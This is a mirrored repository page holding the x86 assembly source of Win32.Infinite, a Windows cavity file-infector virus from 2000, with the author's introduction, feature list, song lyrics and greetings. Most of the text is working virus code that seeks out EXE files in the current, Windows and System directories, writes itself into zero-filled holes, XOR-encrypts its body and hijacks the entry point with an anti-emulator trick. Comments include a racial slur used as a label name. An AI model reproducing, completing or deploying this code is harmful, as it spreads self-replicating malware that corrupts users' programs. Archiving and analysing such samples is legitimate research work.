ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
main
MalwareSourceCode/Win32/Infector/Win32.Infinite.asm

1066 lines
35 KiB
NASM
Raw Permalink Normal View History

Add files via upload
2020-10-11 03:07:43 +00:00
;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [ Win32.Infinite Billy Belcebu/iKX ]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[ 1699 bytes Target - Win32 Ring3 ]<5D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> [ 17/07/00 - Made in Valencia, Spain ]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
;
;
; [ Introduction ]
;
; Welcome to Infinite. This virus has been very rare for me, as its ambient
; of development was very odd. Well, it's my first virus using cavity tech,
; something that i thought that it was more difficult than it really was...
; I sincerely doubt that it would work in WinNT family (NT4,W2K), as i havent
; been able to test it there (Win2k has some incompatibilities with my
; 3DFX Voodoo2 and my soundcard), but i didn't wanted to change that thing of
; Win32. If it doesn't, i don't care... Blah blah blah, i've returned from my
; laaaarge VX holydays and i've just recently finished Forever and this babe.
; I hope i haven't lost my awesome code style (blah, just kidding... i don't
; have anything awesome besides the size of my dick - enormous) :)
; Oh, i almost forgot... I've realized that the cavity technique is stable
; most of the times, but it's not perfect, and i should do much more compro-
; bations before infection than the already existing ones, but i really don't
; care: Windows also has fails in its code and noone reminds it ;)
; It's not a special virus in any field, but i wanted to do some cavity stuff
; and here it is. Mwaha!
;
; [ Features ]
;
; + Cavity virus, searches for holes of zeroes or INT 3.
; + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories.
; + Simple & silly 8-byte XOR encryption loop
; + Kinda simple EPO with emulator protection
; + Checks for SFC protection (if it works in Win2k...)
; + CRC32 usage (APIs, extensions...)
; + It's intended to be optimized (not too much, but enough)
;
; [ Greetings ]
;
; This time the greets will go to few ppl. From the VX scene, to StarZer0,
; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon,
; and from outside to my best friends out there.Also to the people that tries
; to make this place we call world a much better place. You rule, guyz.
;
; [ Infinity - The song ]
;
; Mother watch your children
; The iron fist of fear is ruling our lives
; It's not too late to change the course
; We can make this world a better place to be in
;
; How much more do we want until we're satisfied?
; What happens when we have what we want?
; Acquiring more, still there's never enough
; We forget those who really are in need
; The end is near, or so they say
; Selling peace with guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; Guns spitting (out the) message of peace everywhere
; Is it really that we don't care?
; See mercenaries of fear selling love
; Telling salvation comes from above
; Arrogance and fear walking hand in hand
; We must see that there's much more to life than this
;
; Mother see your children
; Make us understand to and help us to find the way
; The answers lie inside
; They are locked inside to the vault of truth of us
; It's time to spread the word around
; Be yourself and do what you want to do with your life
; Remember, you get just what you give
; You reap all what you sow
; You are in charge of your own life
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; You make your own way
;
; ------------------------------------------
; Infinity - [ Stratovarius ] - ( Infinite )
;
; (c) 2000 Billy Belcebu/iKX [ http://beautifulpeople.cjb.net ]
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Win32.Infinite (c) 2000 Billy Belcebu/iKX <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
include host.inc ; Some nice includes
include infinite.inc
virseg segment dword use32 public'infinite'
virus_start:
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Virus code <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
infinite:
push eax ; Make some space on stack
pushad
call decrypt
encrypt_start = $
call get_delta
call SetSEH ; Set our new protection frame
mov esp,[esp+08h]
call get_delta
jmp RestoreSEH
SetSEH:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
push 05h ; ECX is the limit of pages
pop ecx
mov esi,ebp ; We put a page inside our code
call CheckImageBase ; Get our own image base
mov dword ptr [ebp+modbase-delta],esi
push 05h ; 50 pages to scan
pop ecx
mov esi,[esp+2Ch] ; Put the candidate to kernel
call CheckImageBase ; Scan backwards for it
mov dword ptr [ebp+kernel-delta],esi
lea eax,[ebp+api_list-delta] ; Let's detect all the needed
xchg eax,esi ; APIs :)
lea edi,[ebp+api_addresses-delta]
call GetAPIs
; Virus is now initialized, let's search for objectives.
lea edi,[ebp+current_dir-delta] ; Save current directory to
push edi ; a temp variable
push 7Fh
apicall GetCurrentDirectoryA
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetWindowsDirectoryA
call SetDir&Infect
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetSystemDirectoryA
call SetDir&Infect
lea edi,[ebp+current_dir-delta]
push edi
apicall SetCurrentDirectoryA
call Seek&Infect
; Now let's unprotect the memory where the epo bytes will be restored
call hh&l ; Hunting high & low :)
dq ?
hh&l: push 04h ; PAGE_READWRITE
push epo_bytes
mov eax,dword ptr [ebp+rethost-delta]
add eax,dword ptr [ebp+modbase-delta]
push eax
apicall VirtualProtect
; Now it's time to go away ;)
RestoreSEH:
xor edx,edx ; Restore the original SEH
pop dword ptr fs:[edx]
pop edx
mov edi,(offset host-400000h)
rethost equ $-4
add edi,12345678h
modbase equ $-4
mov [esp.20h],edi
call over0
sebes db epo_bytes dup (90h)
over0: pop esi
push epo_bytes
pop ecx
rep movsb
popad
ret
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Mark of the virus <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
db 0,"Win32.Infinite (c) 2000 Billy Belcebu/iKX",0
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> Search for files to infect <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
SetDir&Infect:
lea edi,dword ptr [ebp+infect_dir-delta]
push edi
apicall SetCurrentDirectoryA
Seek&Infect:
lea eax,[ebp+WFD-delta] ; Search for files
push eax
call over3
db "*.*",0 ; Search for all files
over3: apicall FindFirstFileA
mov dword ptr [ebp+SearchHandle-delta],eax
inc eax
jz FailOccured
SearchForMore:
push dword ptr [ebp+modbase-delta] ; Preserve untouchable info
push dword ptr [ebp+rethost-delta]
lea edi,[(ebp.WFD.szFileName)-delta]; Is the file found factible
push edi ; of being infected?
call ProcessExtension
pop edi
jecxz NotThisTime ; Nopes.
call InfectPE
NotThisTime:
pop dword ptr [ebp+rethost-delta] ; Restore this interesting
pop dword ptr [ebp+modbase-delta] ; info
lea edi,[(ebp.WFD.szFileName)-delta]; Fill this with zeroes
mov ecx,260
xor al,al
rep stosb
lea eax,[ebp.WFD-delta] ; Search for more little
push eax ; suckers
push dword ptr [ebp+SearchHandle-delta]
apicall FindNextFileA
or eax,eax
jnz SearchForMore
CloseSearchHandle:
push dword ptr [ebp+SearchHandle-delta]
apicall FindClose
FailOccured:
ret
ProcessExtension:
; input:
; EDI - Pointer to file name
; output:
; ECX - NULL if it is not an extension; 1 if it is.
xor al,al ; Search for NULL
scasb
jnz $-1
lea esi,[edi-5] ; Get the extension :)
push 05h ; Size to calculate CRC32
pop edi
or dword ptr [esi],20202020h ; Make locase the lewsers
call CRC32
cmp eax,0F643C743h ; Only EXE files
jz ItWasExtension
dec edx
ItWasExtension:
inc edx
mov ecx,edx
ret
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> PE Infection Engine <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
InfectPE:
; input:
; EDI - Pointer to filename to infect
; output:
; Nothing.
cmp dword ptr [ebp+SfcIsFileProtected-delta],00h
jz NotInWin2k
push edi ; Win2k ability: it has feature
push 00h ; that warns the user if an
apicall SfcIsFileProtected ; important file is being
; modified. If the file has
or eax,eax ; such protection, we won't
jnz ExitInfectPE ; touch it, ok? ;)
NotInWin2k:
push 80h ; Destroy hostile attributes
push edi ; and put normal ones
apicall SetFileAttributesA
xor eax,eax ; Open file for R/W
push eax
push eax
push 03h ; OPEN_EXISTING flag
push eax
inc eax
push eax
push 0C0000000h ; READ / WRITE
push edi
apicall CreateFileA
inc eax
jz ExitInfectPE
dec eax
mov dword ptr [ebp+FileHandle-delta],eax
; Save handle of opened file
push eax
push 00h
push eax
apicall GetFileSize ; Get its size
mov dword ptr [ebp+OriginalSize-delta],eax
pop ecx ; ECX = Handle
xor ebx,ebx ; EBX = 0
push ebx
push 00h ; push size
push ebx
push 04h
push ebx
push ecx ; push handle
apicall CreateFileMappingA
or eax,eax
jz CloseFileExitInfectPE
mov dword ptr [ebp+MapHandle-delta],eax
xor ebx,ebx
push 00h ; We want map only file size
push ebx
push ebx
push 02h
push eax
apicall MapViewOfFile
or eax,eax
jz UnMap&CloseMap&FileExitInfectPE
mov dword ptr [ebp+MapAddress-delta],eax
mov esi,[eax+3Ch] ; Ptr to PE header =]
add esi,eax
mov dword ptr [ebp+PtrPEH-delta],esi
cmp word ptr [esi],"EP" ; Check for PE mark
jnz Trunc&UnMap&CloseMap&FileExitInfectPE
cmp dword ptr [esi.MagicInfection],inf_mark
jz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for previous infection
cmp word ptr [esi.Machine],014Ch
jnz Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for i386 ;)
cmp dword ptr [ebp.WFD.nFileSizeHigh-delta],00h
jne Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow huge & ugly files
cmp dword ptr [ebp.WFD.nFileSizeLow-delta],4000h
jb Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow too little files
mov eax,[esi.EntrypointRVA] ; EAX = Old file's EIP
mov dword ptr [ebp+rethost-delta],eax
mov edi,esi
add esi,0F8h-28h ; Pointer to 1st section-28h
nigger: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi.VirtualAddress] ; Remove the VirtualAddress
cmp edx,[esi.VirtualSize] ; Is EIP pointing to this sec?
jae nigger ; If not, loop again
mov ebx,dword ptr [ebp+MapAddress-delta]
pushad
push dword ptr [esi.SizeOfRawData] ; Some tricky thing :)
pop dword ptr [esi.VirtualSize]
mov eax,[ebp+rethost-delta]
add eax,ebx
mov dword ptr [ebp+tempshit-delta],eax
popad
add ebx,[esi.PtrToRawData]
add edx,ebx
mov esi,edx ; ESI - Pointer to section
mov dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.
mov ebx,dword ptr [ebp+OriginalSize-delta] ; Search limit
mov ecx,heap_end-virus_start+security ; How many space do we need
call SeekForHoles
jc ThereWasNoHole
pushad
sub eax,dword ptr [ebp+MapAddress-delta]
mov esi,dword ptr [ebp+PtrPEH-delta]
mov edi,esi ; We wanna put some attribs
add esi,0F8h-28h ; to the section where the
niggr2: add esi,28h ; virus code is located, so
mov edx,eax ; we've to search for it :)
sub edx,[esi.VirtualAddress]
cmp edx,[esi.VirtualSize]
jae niggr2
; EAX = Ptr to hole
mov dword ptr [ebp+inf_switch-delta],00h
; Let's check if we can put ourselves inside the hole (more security)
mov edx,[esi.VirtualAddress]
add edx,[esi.VirtualSize]
add eax,((heap_end-virus_start)+security)
sub edx,eax
js wecantinfectthere
mov dword ptr [ebp+inf_switch-delta],01h
or [esi.Characteristics],0A0000020h ; PUT IT SUCKA!
wecantinfectthere:
popad
mov ecx,12345678h
org $-4
inf_switch dd ?
or ecx,ecx
jz Trunc&UnMap&CloseMap&FileExitInfectPE
lea esi,[ebp+virus_start-delta]
mov edi,eax
add edi,security ; Some security :)
pushad
mov eax,12345678h ; Let's calculate where the
tempshit = $-4 ; jmp must point to
add eax,(killemu-epo)
sub edi,eax
mov dword ptr [ebp+jmpadd-delta],edi
popad
mov ecx,virus_size
rep movsb
; Encrypt with a silly l00p
pushad
sub edi,virus_end-encrypt_start
mov esi,edi
call random
mov bl,al
mov byte ptr [edi+enc_key-encrypt_start],bl
mov byte ptr [ebp+enc_k3y-delta],bl
mov ecx,encrypt_end-encrypt_start
enc_l00p:
lodsb
xor al,bl
stosb
loop enc_l00p
popad
pushad
sub edi,(virus_size-(sebes-virus_start))
mov esi,dword ptr [ebp+EPofs-delta]
push epo_bytes
pop ecx
pushad
lewpit:
lodsb ; Store EPO bytes also
xor al,00h ; encrypted
enc_k3y = $-1
stosb
loop lewpit
popad
xchg edi,esi
call over69
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
epo: call killemu ;<3B> This code will give the control to the
mov esp,[esp+08h] ;<3B> virus and avoid the scanning of emulators
xor edx,edx ;<3B> at the same time :)
pop dword ptr fs:[edx];<3B>
pop edx ;<3B>
db 0E9h ;<3B>
jmpadd: dd ? ;<3B>
killemu:xor edx,edx ;<3B>
push dword ptr fs:[edx];<3B>
mov fs:[edx],esp ;<3B>
div edx ;<3B>
epo_bytes = $-epo ;<3B>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
over69: pop esi
rep movsb
popad
mov esi,dword ptr [ebp+PtrPEH-delta]
mov dword ptr [esi.MagicInfection],inf_mark ; Put inf. mark
; Fix checksum if needed
add esi,58h
cmp dword ptr [esi],00h
jz Trunc&UnMap&CloseMap&FileExitInfectPE
push esi ; Pointer to CheckSum field
call n4t4s
dd ? ; Where store old CheckSum
n4t4s: push dword ptr [ebp+OriginalSize-delta]
push dword ptr [ebp+MapAddress-delta]
apicall CheckSumMappedFile
ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapAddress-delta]
apicall UnmapViewOfFile
CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapHandle-delta]
apicall CloseHandle
CloseFileExitInfectPE:
push dword ptr [ebp+FileHandle-delta]
apicall CloseHandle
ExitInfectPE:
ret
SeekForHoles:
; input:
; ESI - Pointer inside file (in PE header)
; ECX - How many space do we need
; EBX - Search limit
; output:
; EAX - Pointer to the beginning of the shit
; CF - Set if error (couldn't find hole)
call SetSEH1
mov esp,[esp+08h] ; Just for security of
call get_delta ; scanning :)
jmp NSE_
SetSEH1:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
push esi
GetAnotherByte:
xor edx,edx ; Clear counter :)
GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)
lodsb
or al,al ; NULL byte?
jz IsFillByte
cmp al,0CCh ; Int 3? (VC6 filez're full
jnz GetAnotherByte ; of them)
IsFillByte:
inc edx ; Increase counter
cmp ecx,edx
jnz GAB2
WeFoundManyShit:
sub esi,ecx ; ESI = Point to shit
xchg eax,esi
pop esi
pop dword ptr fs:[00h]
pop edx
ret
NoShitEnough:
pop esi
NSE_: stc
pop dword ptr fs:[00h]
pop edx
ret
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ
; <20> APICRC32 Search Engine <20>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͼ
GetAPIs proc
; input:
; EAX - Base address of the library where search the APIs
; ESI - Pointer to an array of CRC32 of the APIs we want to search
; EDI - Pointer to where store the APIs
; output:
; Nothing.
push eax ; EAX = Handle of module
pop dword ptr [ebp+TmpModuleBase-delta]
APIS33K:
lodsd ; Get in EAX the CRC32 of API
push esi edi
call GetAPI_ET_CRC32
pop edi esi
stosd ; Save in [EDI] the API address
cmp byte ptr [esi],0BBh ; There are more APIs in this
jnz APIS33K ; library
inc esi ; Check if it's the last of
cmp byte ptr [esi],"" ; all them
jz EndOfAPISearch
push esi ; ESI points now to the ASCIIz
apicall LoadLibraryA ; string of a library... We
; need to load it!
push eax
nxtchr: lodsb ; Reach the end of the lib
test al,al ; asciiz name
jnz nxtchr
pop eax
jmp GetAPIs
EndOfAPISearch:
ret
GetAPIs endp
GetAPI_ET_CRC32 proc
; input:
; EAX - CRC32 of the API we want to know its address
; output:
; EAX - API address, NULL if error
xor edx,edx
pushad
call over_APICRC32_SEH
mov esp,[esp+08h] ; Set stack as before
xor eax,eax ; signalize the error
jmp Remove_APICRC32_SEH
over_APICRC32_SEH:
